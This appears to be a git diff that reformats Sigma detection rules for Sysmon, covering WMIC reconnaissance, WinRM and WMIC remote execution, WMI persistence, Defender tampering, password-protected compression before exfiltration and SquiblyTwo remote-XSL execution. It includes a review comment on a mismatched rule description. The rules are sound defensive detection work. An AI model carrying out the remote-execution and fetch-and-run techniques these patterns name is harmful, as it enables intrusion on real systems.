@@ -1,8 +1,7 @@ title: Remote Code Execute via Winrm.vbs id: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 status: test -description: Detects an attempt to execute code or create service on remote host via - winrm.vbs. +description: Detects an attempt to execute code or create service on remote host via winrm.vbs. references: - https://twitter.com/bohops/status/994405551751815170 - https://redcanary.com/blog/lateral-movement-winrm-wmi/ @@ -22,10 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cscript.exe - - OriginalFileName: cscript.exe + # Note: winrm.vbs can only be run by a process named cscript (see "IsCScriptEnv" function) + - Image|endswith: \cscript.exe + - OriginalFileName: cscript.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - winrm - invoke Create wmicimv2/Win32_ - -r:http diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml index 1a1738196..0a412dd92 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml @@ -1,9 +1,7 @@ title: Remote PowerShell Session Host Process (WinRM) id: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 status: test -description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM - host process) as a parent or child process (sign of an active PowerShell remote - session). +description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). references: - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html author: Roberto Rodriguez @Cyb3rWard0g 
@@ -22,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \wsmprovhost.exe - - ParentImage|endswith: \wsmprovhost.exe + - Image|endswith: \wsmprovhost.exe + - ParentImage|endswith: \wsmprovhost.exe condition: process_creation and selection fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml index f193519c7..76ce12517 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Processes Spawned by WinRM id: 5cc2cda8-f261-4d88-a2de-e9e193c86716 status: test -description: Detects suspicious processes including shells spawnd from WinRM host - process +description: Detects suspicious processes including shells spawnd from WinRM host process author: Andreas Hunkeler (@Karneades), Markus Neis date: 2021/05/20 modified: 2022/07/14 diff --git a/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml index d99b5bd33..cbaf8b9e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml 
@@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With WINZIP id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_winzip: - CommandLine|contains: + CommandLine|contains: - winzip.exe - winzip64.exe selection_password: - CommandLine|contains: -s" + CommandLine|contains: -s" selection_other: - CommandLine|contains: + CommandLine|contains: - ' -min ' - ' -a ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml b/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml index ae01c9872..9845b0c96 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml @@ -23,7 +23,7 @@ detection: ParentImage|endswith: \EdgeTransport.exe filter_conhost: Image: C:\Windows\System32\conhost.exe - filter_oleconverter: + filter_oleconverter: # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18 Image|startswith: C:\Program Files\Microsoft\Exchange Server\ Image|endswith: \Bin\OleConverter.exe condition: process_creation and (selection and not 1 of filter_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml b/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml index e8fdee74c..164b5c7f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml @@ -25,8 +25,6 @@ detection: condition: process_creation and selection falsepositives: - Legitimate event consumers - - Dell computers on some versions register an event consumer that is known to - cause false positives when brightness is changed by the corresponding keyboard - button + - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml index 6e27487f6..02a716919 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml @@ -1,8 +1,7 @@ title: New ActiveScriptEventConsumer Created Via Wmic.EXE id: ebef4391-1a81-4761-a40a-1db446c0e625 status: test -description: Detects WMIC executions in which an event consumer gets created. This - could be used to establish persistence +description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence references: - https://twitter.com/johnlatwc/status/1408062131321270282?s=12 - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf 
@@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ActiveScriptEventConsumer - ' CREATE ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml index 2cf82e89d..c8eabb532 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml @@ -1,8 +1,7 @@ title: Potential Windows Defender Tampering Via Wmic.EXE id: 51cbac1e-eee3-4a90-b1b7-358efb81fa0a status: test -description: Detects potential tampering with Windows Defender settings such as adding - exclusion using wmic +description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_cli: - CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender + CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml index 828f907a2..f25966d4c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml @@ -1,11 +1,10 @@ title: New Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d related: - - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 - type: derived + - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 # For suspicious process creation + type: derived status: test -description: Detects new process creation using WMIC via the "process call create" - flag +description: Detects new process creation using WMIC via the "process call create" flag references: - https://www.sans.org/blog/wmic-for-incident-response/ - https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - call - create diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml index 4048328a2..74b1c0539 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml 
@@ -1,8 +1,7 @@ title: Computer System Reconnaissance Via Wmic.EXE id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f status: test -description: Detects execution of wmic utility with the "computersystem" flag in order - to obtain information about the machine such as the domain, username, model, etc. +description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: computersystem + CommandLine|contains: computersystem condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml index d7544dcb0..aec06ec8f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml @@ -1,8 +1,7 @@ title: Hardware Model Reconnaissance Via Wmic.EXE id: 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d status: test -description: Detects the execution of WMIC with the "csproduct" which is used to obtain - information such as hardware models and vendor information +description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information references: - https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/ - https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks 
@@ -21,10 +20,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \wmic.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \wmic.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains: csproduct
+ CommandLine|contains: csproduct
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml
index 82b6af544..8a783789d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml
@@ -1,17 +1,11 @@
 title: Local Groups Reconnaissance Via Wmic.EXE
 id: 164eda96-11b2-430b-85ff-6a265c15bf32
 status: test
-description: 'Detects the execution of "wmic" with the "group" flag.
-
+description: |
+ Detects the execution of "wmic" with the "group" flag.
 Adversaries may attempt to find local system groups and permission settings.
-
- The knowledge of local system permission groups can help adversaries determine
- which groups exist and which users belong to a particular group.
-
- Adversaries may use this information to determine which users have elevated permissions,
- such as the users found within the local administrators group.
-
- '
+ The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
+ Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
 author: frack113
@@ -29,10 +23,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \wmic.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \wmic.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains: ' group'
+ CommandLine|contains: ' group'
 condition: process_creation and (all of selection*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml
index 53ef3a5fc..d43b80f7b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml
@@ -1,9 +1,7 @@
 title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE
 id: dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45
 status: test
-description: Detects the execution of wmic with the "qfe" flag in order to obtain
- information about installed hotfix updates on the system. This is often used by
- pentester and attacker enumeration scripts
+description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
 references:
 - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat
 - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
@@ -22,10 +20,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - OriginalFileName: wmic.exe
- - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
 selection_cli:
- CommandLine|contains: ' qfe'
+ CommandLine|contains: ' qfe'
 condition: process_creation and (all of selection*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml
index 7f9392200..0f53440bd 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml
@@ -1,9 +1,7 @@
 title: Process Reconnaissance Via Wmic.EXE
 id: 221b251a-357a-49a9-920a-271802777cc0
 status: test
-description: Detects the execution of "wmic" with the "process" flag, which adversary
- might use to list processes running on the compromised host or list installed
- software hotfixes and patches.
+description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
@@ -22,12 +20,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \WMIC.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains: process
+ CommandLine|contains: process
 filter_main_creation:
- CommandLine|contains|all:
+ CommandLine|contains|all:
+ # Rule id 526be59f-a573-4eea-b5f7-f0973207634d for `wmic process call create #{process_to_execute}`
 - call
 - create
 condition: process_creation and (all of selection* and not 1 of filter_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml
index 05d9c2ec4..42dc346e4 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml
@@ -1,8 +1,7 @@
 title: Potential Product Reconnaissance Via Wmic.EXE
 id: 15434e33-5027-4914-88d5-3d4145ec25a9
 status: test
-description: Detects the execution of WMIC in order to get a list of firewall and
- antivirus products
+description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
 references:
 - https://thedfirreport.com/2023/03/06/2022-year-in-review/
 - https://www.yeahhub.com/list-installed-programs-version-path-windows/
@@ -21,10 +20,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \wmic.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \wmic.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains: Product
+ CommandLine|contains: Product
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml
index ed4da1d40..e84984a80 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml
@@ -1,8 +1,7 @@
 title: Potential Product Class Reconnaissance Via Wmic.EXE
 id: e568650b-5dcd-4658-8f34-ded0b1e13992
 status: test
-description: Detects the execution of WMIC in order to get a list of firewall and
- antivirus products
+description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
 references:
 - https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md
 - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1
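Review bot: The rejoined description of rule 15434e33 ("get a list of firewall and antivirus products") no longer matches what its detection does: `selection_cli` is `CommandLine|contains: Product`, a bare substring that also fires on `csproduct` (already covered by 3e3ceccd) and on plain `product get` software enumeration, which is what the yeahhub reference on installed programs describes. The same sentence is used verbatim by rule e568650b, whose `AntiVirusProduct`/`FirewallProduct` selection is the one that actually targets security products. Suggest wording the description after the logic, e.g. `description: Detects the execution of WMIC with the "product" keyword, which is used to enumerate installed software and may also surface firewall and antivirus products`, and cross-linking the two rules in `related` so the overlap is intentional rather than accidental.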
@@ -22,10 +21,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \wmic.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \wmic.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - AntiVirusProduct
 - FirewallProduct
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml
index ce42048eb..98cb5ce84 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml
@@ -1,22 +1,14 @@
 title: Service Reconnaissance Via Wmic.EXE
 id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae
 related:
- - id: 68bcd73b-37ef-49cb-95fc-edc809730be6
- type: similar
+ - id: 68bcd73b-37ef-49cb-95fc-edc809730be6
+ type: similar
 status: test
-description: 'An adversary might use WMI to check if a certain remote service is running
- on a remote device.
-
- When the test completes, a service information will be displayed on the screen
- if it exists.
-
- A common feedback message is that "No instance(s) Available" if the service queried
- is not running.
-
- A common error message is "Node - (provided IP or default) ERROR Description =The
- RPC server is unavailable" if the provided remote host is unreachable
-
- '
+description: |
+ An adversary might use WMI to check if a certain remote service is running on a remote device.
+ When the test completes, a service information will be displayed on the screen if it exists.
+ A common feedback message is that "No instance(s) Available" if the service queried is not running.
+ A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
@@ -34,10 +26,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \WMIC.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains: service
+ CommandLine|contains: service
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml
index 173eb37b2..6c8b26b22 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml
@@ -1,20 +1,14 @@
 title: Uncommon System Information Discovery Via Wmic.EXE
 id: 9d5a1274-922a-49d0-87f3-8c653483b909
 related:
- - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e
- type: derived
+ - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e
+ type: derived
 status: experimental
-description: 'Detects the use of the WMI command-line (WMIC) utility to identify and
- display various system information,
-
- including OS, CPU, GPU, and disk drive names; memory capacity; display resolution;
- and baseboard, BIOS,
-
+description: |
+ Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+ including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
 and GPU driver products/versions.
-
 Some of these commands were used by Aurora Stealer in late 2022/early 2023.
-
- '
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic
 - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/
@@ -37,11 +31,11 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_wmic:
- - Description: WMI Commandline Utility
- - OriginalFileName: wmic.exe
- - Image|endswith: \WMIC.exe
+ - Description: WMI Commandline Utility
+ - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
 selection_commands:
- CommandLine|contains:
+ CommandLine|contains:
 - LOGICALDISK get Name,Size,FreeSpace
 - os get Caption,OSArchitecture,Version
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml
index 4fe9a097d..3dda59014 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml
@@ -1,13 +1,12 @@
 title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
 id: 68bcd73b-37ef-49cb-95fc-edc809730be6
 related:
- - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b
- type: similar
- - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae
- type: similar
+ - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant
+ type: similar
+ - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae
+ type: similar
 status: experimental
-description: Detects known WMI recon method to look for unquoted service paths using
- wmic. Often used by pentester and attacker enumeration scripts
+description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
 references:
 - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py
 - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1
@@ -27,10 +26,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - OriginalFileName: wmic.exe
- - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' service get '
 - name,displayname,pathname,startmode
 condition: process_creation and (all of selection*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml
index cae1495c4..c91f79802 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml
@@ -1,10 +1,10 @@
 title: WMIC Remote Command Execution
 id: 7773b877-5abb-4a3e-b9c9-fd0369b59b00
 related:
- - id: e42af9df-d90b-4306-b7fb-05c863847ebd
- type: obsoletes
- - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf
- type: obsoletes
+ - id: e42af9df-d90b-4306-b7fb-05c863847ebd
+ type: obsoletes
+ - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf
+ type: obsoletes
 status: test
 description: Detects the execution of WMIC to query information on a remote system
 references:
@@ -24,12 +24,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \WMIC.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains: '/node:'
+ CommandLine|contains: '/node:'
 filter_localhost:
- CommandLine|contains:
+ CommandLine|contains:
 - '/node:127.0.0.1 '
 - '/node:localhost '
 condition: process_creation and (all of selection_* and not 1 of filter_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml
index 552f33e7b..2686bee50 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml
@@ -19,13 +19,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - OriginalFileName: wmic.exe
- - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' service '
 - ' call '
- CommandLine|contains:
+ CommandLine|contains:
 - stopservice
 - startservice
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml
index 4c258ae38..2ac309d82 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml
@@ -1,11 +1,10 @@
 title: Potential SquiblyTwo Technique Execution
 id: 8d63dadf-b91b-4187-87b6-34a1114577ea
 status: test
-description: Detects potential SquiblyTwo attack technique with possible renamed WMIC
- via Imphash and OriginalFileName fields
+description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
 references:
 - https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
- - https://twitter.com/mattifestation/status/986280382042595328
+ - https://twitter.com/mattifestation/status/986280382042595328 # Deleted
 - https://atomicredteam.io/defense-evasion/T1220/
 - https://lolbas-project.github.io/lolbas/Binaries/Wmic/
 author: Markus Neis, Florian Roth
@@ -27,18 +26,18 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_pe:
- - Image|endswith: \wmic.exe
- - OriginalFileName: wmic.exe
- - Imphash:
- - 1B1A3F43BF37B5BFE60751F2EE2F326E
- - 37777A96245A3C74EB217308F3546F4C
- - 9D87C9D67CE724033C0B40CC4CA1B206
- - Hashes|contains:
- - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E
- - IMPHASH=37777A96245A3C74EB217308F3546F4C
- - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206
+ - Image|endswith: \wmic.exe
+ - OriginalFileName: wmic.exe
+ - Imphash:
+ - 1B1A3F43BF37B5BFE60751F2EE2F326E
+ - 37777A96245A3C74EB217308F3546F4C
+ - 9D87C9D67CE724033C0B40CC4CA1B206
+ - Hashes|contains: # Sysmon field hashes contains all types
+ - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E
+ - IMPHASH=37777A96245A3C74EB217308F3546F4C
+ - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'format:'
 - http
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml
index 4e7e8b48f..75fa64511 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml
@@ -1,19 +1,18 @@
 title: Suspicious WMIC Execution Via Office Process
 id: e1693bc8-7168-4eab-8718-cdcaa68a1738
 related:
- - id: 438025f9-5856-4663-83f7-52f878a70a50
- type: derived
- - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a
- type: obsoletes
- - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0
